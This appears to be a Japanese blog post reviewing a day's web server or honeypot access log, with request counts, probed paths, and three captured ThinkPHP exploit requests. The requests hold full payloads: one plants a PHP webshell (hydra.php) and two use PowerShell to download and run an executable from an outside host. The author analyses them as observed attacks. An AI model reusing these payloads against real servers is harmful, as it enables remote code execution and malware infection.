結局昨日も前に書いたメール飛ばすscriptのメンテナンスに時間をとられてしまっていたorz
今日は無事に稼働していたので、もう大丈夫になったと信じたい・・
■2019-04-12のアクセス数は84件でした。
■送信元IPアドレスの数は 63件です。
■メソッドの一覧と件数は以下です。
method | 総数 – method |
CONNECT | 1 |
GET | 82 |
POST | 1 |
合計 結果 | 84 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 |
/ | GET | 61 |
//vtigercrm/vtigerservice.php | GET | 2 |
/ccvv | GET | 1 |
/Main | GET | 1 |
/myadmin/scripts/setup.php | GET | 2 |
/mysql/scripts/setup.php | GET | 1 |
/mysqlmanager/scripts/setup.php | GET | 1 |
/phpmyadmin/ | GET | 2 |
/phpMyAdmin/scripts/setup.php | GET | 1 |
/phpmyadmin/scripts/setup.php/index.php | GET | 1 |
/pma/scripts/setup.php | GET | 1 |
/public/hydra.php?xcmd=cmd.exe%20/c%20 powershell%20(new-object%20System.Net.WebClient) .DownloadFile (‘http://fid.hognoob.se/download.exe’,’ C:/Windows/temp/ubhflqgunjzgqat2803.exe’); start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe | GET | 1 |
/public/index.php?s=/index/\think\app/invokefunction &function=call_user_func_array&vars[0]=system&vars[1][]= echo%20^<?php%20$action%20=%20$_GET[‘xcmd’] | GET | 1 |
/public/index.php?s=index/think\app/invokefunction& function=call_user_func_array&vars[0]=system &vars[1][]=cmd.exe%20/c%20powershell%20 (new-object%20System.Net.WebClient). DownloadFile(‘http://fid.hognoob.se/download.exe’, ‘C:/Windows/temp/ubhflqgunjzgqat2803.exe’);start%20 C:/Windows/temp/ubhflqgunjzgqat2803.exe | GET | 1 |
/scripts/setup.php | GET | 1 |
/tmUnblock.cgi | POST | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | GET | 2 |
www.google.com:443 | CONNECT | 1 |
(空白) | GET | 2 |
気になるlog
-=-=54〜56件目のlog=-=-
#1つめ [2019-04-12 14:15:02+0900] GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: zh-cn Referer: http://ほげ:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: ほげ #2つめ [2019-04-12 14:15:02+0900] GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: zh-cn Referer: http://ほげ/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: ほげ #3つめ [2019-04-12 14:15:02+0900] GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: zh-cn Referer: http://ほげ:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: ほげ
これらはthinkPHPの脆弱性をつく攻撃。よくセットでくるなぁと思っていたら、これらは相関関係があった。
1ひとつめの通信は脆弱性からcmdからpowershellを起動させマルウェアをダウンロード&実行している。
2つめの通信は脆弱性からhydra.phpを設置し、cmdを実行するwebshellを設置している
3つめの通信は単純に設置したhydra.phpをついてcmdからpowershellを起動させマルウェアをダウンロード&実行している。